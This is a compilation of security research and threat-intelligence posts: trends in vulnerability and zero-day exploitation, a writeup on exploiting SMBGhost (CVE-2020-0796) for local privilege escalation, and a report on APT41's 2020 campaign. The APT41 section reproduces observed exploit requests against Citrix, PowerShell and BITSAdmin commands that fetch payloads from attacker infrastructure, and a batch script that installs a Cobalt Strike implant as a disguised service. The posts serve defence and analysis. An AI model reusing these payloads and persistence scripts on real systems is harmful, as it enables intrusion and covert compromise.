  • 2 days: Apache Struts (CVE-2018-11776, High); Cisco Adaptive Security Appliance (CVE-2018-0101, High); Oracle WebLogic Server (CVE-2018-2893, High); Microsoft Windows Server (CVE-2018-8440, Medium); Drupal (CVE-2019-6340, Medium); Atlassian Confluence (CVE-2019-3396, High)

Table 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018–Q3 2019

Trends by Targeted Products

FireEye judges that malicious actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.

The majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.


Figure 6: Exploited vulnerabilities by vendor, Q1 2018–Q3 2019

Outlook and Implications

The speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.

We recommend using this exploitation trend information to better prioritize patching schedules, in combination with other factors such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely the software is deployed in an organization's environment. Taken together, these considerations may help mitigate the risk of a large portion of malicious activity.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Zero-Day Exploitation Increasingly Demonstrates Access to Money, Rather than Skill — Intelligence for Vulnerability Management, Part One

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

FireEye Mandiant Threat Intelligence documented more zero-days exploited in 2019 than any of the previous three years. While not every instance of zero-day exploitation can be attributed to a tracked group, we noted that a wider range of tracked actors appear to have gained access to these capabilities. Furthermore, we noted a significant increase over time in the number of zero-days leveraged by groups suspected to be customers of companies that supply offensive cyber capabilities, as well as an increase in zero-days used against targets in the Middle East, and/or by groups with suspected ties to this region. Going forward, we are likely to see a greater variety of actors using zero-days, especially as private vendors continue feeding the demand for offensive cyber weapons.

Zero-Day Usage by Country and Group

Since late 2017, FireEye Mandiant Threat Intelligence noted a significant increase in the number of zero-days leveraged by groups that are known or suspected to be customers of private companies that supply offensive cyber tools and services. Additionally, we observed an increase in zero-days leveraged against targets in the Middle East, and/or by groups with suspected ties to this region.

Examples include:

  • The group described by researchers as Stealth Falcon and FruityArmor is an espionage group that has reportedly targeted journalists and activists in the Middle East. In 2016, this group used malware sold by NSO Group, which leveraged three iOS zero-days. From 2016 to 2019, this group used more zero-days than any other group.
  • The activity dubbed SandCat in open sources, suspected to be linked to Uzbekistan state intelligence, has been observed using zero-days in operations against targets in the Middle East. This group may have acquired their zero-days by purchasing malware from private companies such as NSO group, as the zero-days used in SandCat operations were also used in Stealth Falcon operations, and it is unlikely that these distinct activity sets independently discovered the same three zero-days.
  • Throughout 2016 and 2017, activity referred to in open sources as BlackOasis, which also primarily targets entities in the Middle East and likely acquired at least one zero-day in the past from private company Gamma Group, demonstrated similarly frequent access to zero-day vulnerabilities.

We also noted examples of zero-day exploitation that have not been attributed to tracked groups but that appear to have been leveraged in tools provided by private offensive security companies, for instance:

  • In 2019, a zero-day exploit in WhatsApp (CVE-2019-3568) was reportedly used to distribute spyware developed by NSO group, an Israeli software company.
  • FireEye analyzed activity targeting a Russian healthcare organization that leveraged a 2018 Adobe Flash zero-day (CVE-2018-15982) that may be linked to leaked source code of Hacking Team.
  • Android zero-day vulnerability CVE-2019-2215 was reportedly being exploited in the wild in October 2019 by NSO Group tools.

Zero-Day Exploitation by Major Cyber Powers

We have continued to see exploitation of zero days by espionage groups of major cyber powers.

  • According to researchers, the Chinese espionage group APT3 exploited CVE-2019-0703 in targeted attacks in 2016.
  • FireEye observed North Korean group APT37 conduct a 2017 campaign that leveraged Adobe Flash vulnerability CVE-2018-4878. This group has also demonstrated an increased capacity to quickly exploit vulnerabilities shortly after they have been disclosed.
  • From December 2017 to January 2018, we observed multiple Chinese groups leveraging CVE-2018-0802 in a campaign targeting multiple industries throughout Europe, Russia, Southeast Asia, and Taiwan. At least three out of six samples were used before the patch for this vulnerability was issued.
  • In 2017, Russian groups APT28 and Turla leveraged multiple zero-days in Microsoft Office products. 

In addition, we believe that some of the most dangerous state sponsored intrusion sets are increasingly demonstrating the ability to quickly exploit vulnerabilities that have been made public. In multiple cases, groups linked to these countries have been able to weaponize vulnerabilities and incorporate them into their operations, aiming to take advantage of the window between disclosure and patch application. 

Zero-Day Use by Financially Motivated Actors

Financially motivated groups have and continue to leverage zero-days in their operations, though with less frequency than espionage groups.

In May 2019, we reported that FIN6 used a Windows server 2019 use-after-free zero-day (CVE-2019-0859) in a targeted intrusion in February 2019. Some evidence suggests that the group may have used the exploit since August 2018. While open sources have suggested that the group potentially acquired the zero-day from criminal underground actor "BuggiCorp," we have not identified direct evidence linking this actor to this exploit's development or sale.

Conclusion

We surmise that access to zero-day capabilities is becoming increasingly commodified based on the proportion of zero-days exploited in the wild by suspected customers of private companies. Possible reasons for this include:

  • Private companies are likely creating and supplying a larger proportion of zero-days than they have in the past, resulting in a concentration of zero-day capabilities among highly resourced groups.
  • Private companies may be increasingly providing offensive capabilities to groups with lower overall capability and/or groups with less concern for operational security, which makes it more likely that usage of zero-days will be observed.

It is likely that state groups will continue to support internal exploit discovery and development; however, the availability of zero-days through private companies may offer a more attractive option than relying on domestic solutions or underground markets. As a result, we expect that the number of adversaries demonstrating access to these kinds of vulnerabilities will almost certainly increase and will do so at a faster rate than the growth of their overall offensive cyber capabilities—provided they have the ability and will to spend the necessary funds.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar. 

Sourcing Note: Some vulnerabilities and zero-days were identified based on FireEye research, Mandiant breach investigation findings, and other technical collections. This paper also references vulnerabilities and zero-days discussed in open sources, including Google Project Zero's zero-day "In the Wild" spreadsheet. While we believe these sources are reliable as used in this paper, we do not vouch for the complete findings of those sources. Due to the ongoing discovery of past incidents, we expect that this research will remain dynamic.

Exploiting SMBGhost (CVE-2020-0796) for a Local Privilege Escalation: Writeup + POC

Introduction

CVE-2020-0796 is a bug in the compression mechanism of SMBv3.1.1, also known as “SMBGhost”. The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about three weeks ago. Once we heard about it, we skimmed over the details and created a quick POC (proof of concept) that demonstrates how the bug can be triggered remotely, without authentication, by causing a BSOD (Blue Screen of Death). A couple of days ago we returned to this bug for more than just a remote DoS. The Microsoft Security Advisory describes the bug as a remote code execution (RCE) vulnerability, but there is no public POC that demonstrates RCE through this bug.


Initial Analysis

The bug is an integer overflow bug that happens in the Srv2DecompressData function in the srv2.sys SMB server driver. Here’s a simplified version of the function, with the irrelevant details omitted:

typedef struct _COMPRESSION_TRANSFORM_HEADER
{
    ULONG ProtocolId;
    ULONG OriginalCompressedSegmentSize;
    USHORT CompressionAlgorithm;
    USHORT Flags;
    ULONG Offset;
} COMPRESSION_TRANSFORM_HEADER, *PCOMPRESSION_TRANSFORM_HEADER;

typedef struct _ALLOCATION_HEADER
{
    // ...
    PVOID UserBuffer;
    // ...
} ALLOCATION_HEADER, *PALLOCATION_HEADER;

NTSTATUS Srv2DecompressData(PCOMPRESSION_TRANSFORM_HEADER Header, SIZE_T TotalSize)
{
    PALLOCATION_HEADER Alloc = SrvNetAllocateBuffer(
        (ULONG)(Header->OriginalCompressedSegmentSize + Header->Offset),
        NULL);
    if (!Alloc) {
        return STATUS_INSUFFICIENT_RESOURCES;
    }

    ULONG FinalCompressedSize = 0;

    NTSTATUS Status = SmbCompressionDecompress(
        Header->CompressionAlgorithm,
        (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER) + Header->Offset,
        (ULONG)(TotalSize - sizeof(COMPRESSION_TRANSFORM_HEADER) - Header->Offset),
        (PUCHAR)Alloc->UserBuffer + Header->Offset,
        Header->OriginalCompressedSegmentSize,
        &FinalCompressedSize);
    if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
        SrvNetFreeBuffer(Alloc);
        return STATUS_BAD_DATA;
    }

    if (Header->Offset > 0) {
        memcpy(
            Alloc->UserBuffer,
            (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),
            Header->Offset);
    }

    Srv2ReplaceReceiveBuffer(some_session_handle, Alloc);
    return STATUS_SUCCESS;
}

The Srv2DecompressData function receives the compressed message which is sent by the client, allocates the required amount of memory, and decompresses the data. Then, if the Offset field is not zero it copies the data that is placed before the compressed data as is to the beginning of the allocated buffer.

If we look carefully, we can see that two of these calculations can overflow for certain inputs: the allocation size passed to SrvNetAllocateBuffer, (ULONG)(Header->OriginalCompressedSegmentSize + Header->Offset), and the source length passed to SmbCompressionDecompress, (ULONG)(TotalSize - sizeof(COMPRESSION_TRANSFORM_HEADER) - Header->Offset). For example, most POCs that appeared shortly after the bug was published crashed the system simply by setting the Offset field to 0xFFFFFFFF. That value triggers an integer overflow in the allocation-size calculation, and as a result fewer bytes are allocated.

It also triggers an additional integer overflow in the source-length calculation. The crash happens due to a memory access at the computed source address, (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER) + Header->Offset, far away from the received message. If the code validated the source-length calculation, it would bail out early, since the length is effectively negative and cannot be represented as a valid buffer size, which also makes the computed source address invalid.

Choosing what to overflow

There are only two relevant fields that we can control to cause an integer overflow: OriginalCompressedSegmentSize and Offset, so there aren’t that many options. After trying several combinations, the following combination caught our eye: what if we send a legit Offset value and a huge OriginalCompressedSegmentSize value? Let’s go over the three steps the code is going to execute:

  1. Allocate: The amount of allocated bytes will be smaller than the sum of both fields due to the integer overflow.
  2. Decompress: The decompression will receive a huge OriginalCompressedSegmentSize value, treating the target buffer as practically limitless in size. All other parameters are unaffected, so decompression will proceed as expected.
  3. Copy: If it’s ever going to be executed (will it?), the copy will work as expected.

Whether or not the Copy step is going to be executed, this already looks interesting – we can trigger an out-of-bounds write in the Decompress stage, since we managed to allocate fewer bytes than necessary in the Allocate stage.
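
To make the overflow arithmetic concrete, here is a small sketch (plain Python, independent of SMB) of how the 32-bit truncation behaves for the two input combinations discussed above; the field values are illustrative only.

MASK32 = 0xFFFFFFFF  # the size calculations are truncated to a 32-bit ULONG

def alloc_size(original_compressed_segment_size, offset):
    # Mirrors (ULONG)(Header->OriginalCompressedSegmentSize + Header->Offset)
    return (original_compressed_segment_size + offset) & MASK32

# Crash POCs: Offset = 0xFFFFFFFF wraps the allocation size to a tiny value.
print(hex(alloc_size(0x10, 0xFFFFFFFF)))   # 0xf: far fewer bytes than needed

# Our combination: a legit Offset and a huge OriginalCompressedSegmentSize.
# The allocation wraps to a small value, while the decompressor is still told
# it may write up to 0xFFFFFF00 bytes, giving an out-of-bounds write.
print(hex(alloc_size(0xFFFFFF00, 0x200)))  # 0x100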

As you can see, using this technique we can trigger an overflow of any size and content, which is a great start. But what is located beyond our buffer? Let’s find out!

Diving into SrvNetAllocateBuffer

To answer this question, we need to look at the allocation function, in our case SrvNetAllocateBuffer. Here is the interesting part of the function:

PALLOCATION_HEADER SrvNetAllocateBuffer(SIZE_T AllocSize, PALLOCATION_HEADER SourceBuffer)
{
    // ...

    if (SrvDisableNetBufferLookAsideList || AllocSize > 0x100100) {
        if (AllocSize > 0x1000100) {
            return NULL;
        }
        Result = SrvNetAllocateBufferFromPool(AllocSize, AllocSize);
    } else {
        int LookasideListIndex = 0;
        if (AllocSize > 0x1100) {
            LookasideListIndex = /* some calculation based on AllocSize */;
        }

        SOME_STRUCT list = SrvNetBufferLookasides[LookasideListIndex];
        Result = /* fetch result from list */;
    }

    // Initialize some Result fields...

    return Result;
}

We can see that the allocation function does different things depending on the required amount of bytes. Large allocations (larger than about 16 MB) just fail. Medium allocations (larger than about 1 MB) use the SrvNetAllocateBufferFromPool function for the allocation. Small allocations (the rest) use lookaside lists for optimization.

Note: There’s also the SrvDisableNetBufferLookAsideList flag which can affect the functionality of the function, but it’s set by an undocumented registry setting and is disabled by default, so it’s not very interesting.

Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver. One of the capabilities of lookaside lists is to define custom allocation and free functions that will be used for managing the buffers. Looking at references to the SrvNetBufferLookasides array, we found that it’s initialized in the SrvNetCreateBufferLookasides function, and by looking at it we learned the following:

  • The custom allocation function is defined as SrvNetBufferLookasideAllocate, which just calls SrvNetAllocateBufferFromPool.
  • 9 lookaside lists are created with the following sizes, as we quickly calculated with Python:
    >>> [hex((1 << (i + 12)) + 256) for i in range(9)]
    ['0x1100', '0x2100', '0x4100', '0x8100', '0x10100', '0x20100', '0x40100', '0x80100', '0x100100']

    It matches our finding that allocations larger than 0x100100 bytes are allocated without using lookaside lists.

The conclusion is that every allocation request ends up in the SrvNetAllocateBufferFromPool function, so let’s take a look at it.

SrvNetAllocateBufferFromPool and the allocated buffer layout

The SrvNetAllocateBufferFromPool function allocates a buffer in the NonPagedPoolNx pool using the ExAllocatePoolWithTag function, and then fills some of the structures with data. The layout of the allocated buffer is the following:

The only relevant parts of this layout for the scope of our research are the user buffer and the ALLOCATION_HEADER struct. We can see right away that by overflowing the user buffer, we end up overriding the ALLOCATION_HEADER struct. Looks very convenient.

Overriding the ALLOCATION_HEADER struct

Our first thought at this point was that due to the check that follows the SmbCompressionDecompress call:

if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) {
    SrvNetFreeBuffer(Alloc);
    return STATUS_BAD_DATA;
}

SrvNetFreeBuffer will be called and the function will fail, since we crafted OriginalCompressedSegmentSize to be a huge number, and FinalCompressedSize is going to be a smaller number representing the actual amount of decompressed bytes. So we analyzed the SrvNetFreeBuffer function, managed to replace the allocation pointer with a magic number, and waited for the free function to try to free it, hoping to leverage this later for a use-after-free or similar. But to our surprise, we got a crash in the memcpy function. That made us happy, since we hadn't expected to get there at all, but we had to check why it happened. The explanation can be found in the implementation of the SmbCompressionDecompress function:

NTSTATUS SmbCompressionDecompress(
    USHORT CompressionAlgorithm,
    PUCHAR UncompressedBuffer,
    ULONG  UncompressedBufferSize,
    PUCHAR CompressedBuffer,
    ULONG  CompressedBufferSize,
    PULONG FinalCompressedSize)
{
    // ...

    NTSTATUS Status = RtlDecompressBufferEx2(
        ...,
        FinalUncompressedSize,
        ...);
    if (Status >= 0) {
        *FinalCompressedSize = CompressedBufferSize;
    }

    // ...

    return Status;
}

Basically, if the decompression succeeds, FinalCompressedSize is updated to hold the value of CompressedBufferSize, which is the size of the buffer. This deliberate update of the FinalCompressedSize return value seemed quite suspicious to us, since this little detail, together with the allocated buffer layout, allows for very convenient exploitation of this bug.

Since the execution continues to the stage of copying the raw data, let’s review the call once again:

memcpy(
    Alloc->UserBuffer,
    (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER),
    Header->Offset);

The target address is read from the ALLOCATION_HEADER struct, the one that we can override. The content and the size of the buffer are controlled by us as well. Jackpot! Write-what-where in the kernel, remotely!

Remote write-what-where implementation

We did a quick implementation of a Write-What-Where CVE-2020-0796 Exploit in Python, which is based on the CVE-2020-0796 DoS POC of maxpl0it. The code is fairly short and straightforward.
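
As a rough illustration of what such a message contains, the sketch below packs a COMPRESSION_TRANSFORM_HEADER according to the struct shown earlier. This is a hypothetical fragment, not the actual exploit: the protocol magic and compression-algorithm constants are assumptions, and the SMB negotiation, transport framing, and compressed payload generation are omitted.

import struct

# Assumed constants (not taken from this writeup): compressed SMBv3.1.1 messages
# start with the "\xfcSMB" magic, and LZNT1 is compression algorithm 1.
PROTOCOL_ID_COMPRESSED = 0x424D53FC
ALG_LZNT1 = 0x0001

def compression_transform_header(original_size, offset, algorithm=ALG_LZNT1, flags=0):
    # Field order follows the struct above: ULONG ProtocolId,
    # ULONG OriginalCompressedSegmentSize, USHORT CompressionAlgorithm,
    # USHORT Flags, ULONG Offset.
    return struct.pack('<IIHHI', PROTOCOL_ID_COMPRESSED, original_size,
                       algorithm, flags, offset)

# A legit Offset plus a huge OriginalCompressedSegmentSize, as described above.
raw_prefix = b'A' * 0x10       # the bytes later copied verbatim by the memcpy
header = compression_transform_header(original_size=0xFFFFFF00,
                                      offset=len(raw_prefix))
message = header + raw_prefix  # the compressed payload would be appended here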

Local Privilege Escalation

Now that we have the write-what-where exploit, what can we do with it? Obviously we can crash the system. We might be able to trigger remote code execution, but we didn’t find a way to do that yet. If we use the exploit on localhost and leak additional information, we can use it for local privilege escalation, as it was already demonstrated to be possible via several techniques.

The first technique we tried was proposed by Morten Schenk in his Black Hat USA 2017 talk. The technique involves overriding a function pointer in the .data section of the win32kbase.sys driver, and then calling the appropriate function from user mode to gain code execution. j00ru wrote a great writeup about using this technique in WCTF 2018, and provided his exploit source code. We adjusted it for our write-what-where exploit, but found out that it doesn’t work since the thread that handles the SMB messages is not a GUI thread. Due to this, win32kbase.sys is not mapped, and the technique is not relevant (unless there’s a way to make it a GUI thread, something we didn’t research).

We ended up using the well-known technique covered by cesarcer in his 2012 Black Hat presentation, Easy Local Windows Kernel Exploitation. The technique involves leaking the current process token address using the NtQuerySystemInformation(SystemHandleInformation) API and then overriding it, granting the current process token privileges that can then be used for privilege escalation. The Abusing Token Privileges For EoP research by Bryan Alexander (dronesec) and Stephen Breen (breenmachine) (2017) demonstrates several ways of using various token privileges for privilege escalation.

We based our exploit on the code that Alexandre Beaulieu kindly shared in his Exploiting an Arbitrary Write to Escalate Privileges writeup. We completed the privilege escalation after modifying our process’ token privileges by injecting a DLL into winlogon.exe. The DLL’s whole purpose is to launch a privileged instance of cmd.exe. Our complete Local Privilege Escalation Proof of Concept can be found here and is available for research / defensive purposes only.

Summary

We managed to demonstrate that the CVE-2020-0796 vulnerability can be exploited for local privilege escalation. Note that our exploit is limited to medium integrity level, since it relies on API calls that are unavailable at a lower integrity level. Can we do more than that? Maybe, but it will require more research. There are many other fields that we can override in the allocated buffer; perhaps one of them can help us achieve other interesting things such as remote code execution.

POC Source Code

Remediation

  1. We recommend updating servers and endpoints to the latest Windows version to remediate this vulnerability. If possible, block port 445 until updates are deployed. Regardless of CVE-2020-0796, we recommend enabling host-isolation where possible.
  2. It is possible to disable SMBv3.1.1 compression in order to avoid triggering this bug; however, we recommend applying the full update instead if possible. A sketch of the compression-disabling registry change appears below.
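
For reference, a minimal sketch of that workaround follows, assuming the documented mitigation of setting the DisableCompression value under the LanmanServer parameters key; verify against Microsoft's advisory before relying on it, and run it with administrative privileges.

# Hypothetical sketch: disable SMBv3.1.1 compression (a workaround only; it
# does not replace patching). Assumes Windows and requires Administrator rights.
import winreg

KEY_PATH = r'SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH, 0,
                    winreg.KEY_SET_VALUE) as key:
    # DisableCompression = 1 (REG_DWORD) turns off SMB compression on the server.
    winreg.SetValueEx(key, 'DisableCompression', 0, winreg.REG_DWORD, 1)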

ZecOps Customers & Partners

ZecOps Digital Forensics and Incident Response (DFIR) customers can detect such exploitation attempts as “CVE-2020-0796” using ZecOps agentless solution: Neutrino for Servers and Endpoints. To try ZecOps technology and see a demo, you can contact us here

Researchers wanted

At ZecOps we’re working on offensive cyber security research for defensive purposes. We are hiring additional researchers & exploit developers in various platforms including iOS and Windows. If you are interested, contact us here.


This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits

Beginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine Desktop Central at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.

Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])

Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with CVE-2019-19781 (published December 17, 2019).


Figure 1: Timeline of key events

The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.  

One interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.

POST /vpns/portal/scripts/newbm.pl HTTP/1.1
Host: [redacted]
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
NSC_NONCE: nsroot
NSC_USER: ../../../netscaler/portal/templates/[redacted]
Content-Length: 96

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]

Figure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781

There is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity pattern by Chinese APT groups in past years as well.

Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor).

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 147
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd`') %]

Figure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781

We did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, with only the payload name changed to ‘un’.

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Accept-Encoding: identity
Content-Length: 145
Connection: close
Nsc_User: ../../../netscaler/portal/templates/[redacted]
User-Agent: Python-urllib/2.7
Nsc_Nonce: nsroot
Host: [redacted]
Content-Type: application/x-www-form-urlencoded

url=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un`') %]

Figure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781

Citrix released a mitigation for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.

Cisco Router Exploitation

On February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVEs (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on Cisco RV320 and RV325 small business routers and uses wget to download the specified payload.

GET /test/fuc
HTTP/1.1
Host: 66.42.98\.220
User-Agent: Wget
Connection: close

Figure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget

66.42.98[.]220 also hosted a file at http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, which is the command one would execute on a Cisco RV320 router to display the current configuration.

Cisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the relevant security advisories and take appropriate action.

Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)

On March 5, 2020, researcher Steven Seeley published an advisory and released proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 (CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation, the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java-based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.

java/lang/Runtime

getRuntime

()Ljava/lang/Runtime;

Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\
Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','
C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat

'(Ljava/lang/String;)Ljava/lang/Process;

StackMapTable

ysoserial/Pwner76328858520609

Lysoserial/Pwner76328858520609;

Figure 6: Contents of logger.zip

Here we see a toolmark from the tool ysoserial that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.

In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.

Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe

Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat

Figure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation

In both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).

@echo off

set "WORK_DIR=C:\Windows\System32"

set "DLL_NAME=storesyncsvc.dll"

set "SERVICE_NAME=StorSyncSvc"

set "DISPLAY_NAME=Storage Sync Service"

set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."

 sc stop %SERVICE_NAME%

sc delete %SERVICE_NAME%

mkdir %WORK_DIR%

copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f

sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"

SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000

sc description "%SERVICE_NAME%" "%DESCRIPTION%"

reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f

net start "%SERVICE_NAME%"

Figure 8: Contents of install.bat

Storesyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.

GET /jquery-3.3.1.min.js HTTP/1.1
Host: cdn.bootcss.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.bootcss.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM
DA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive Cache-Control: no-cache

Figure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request

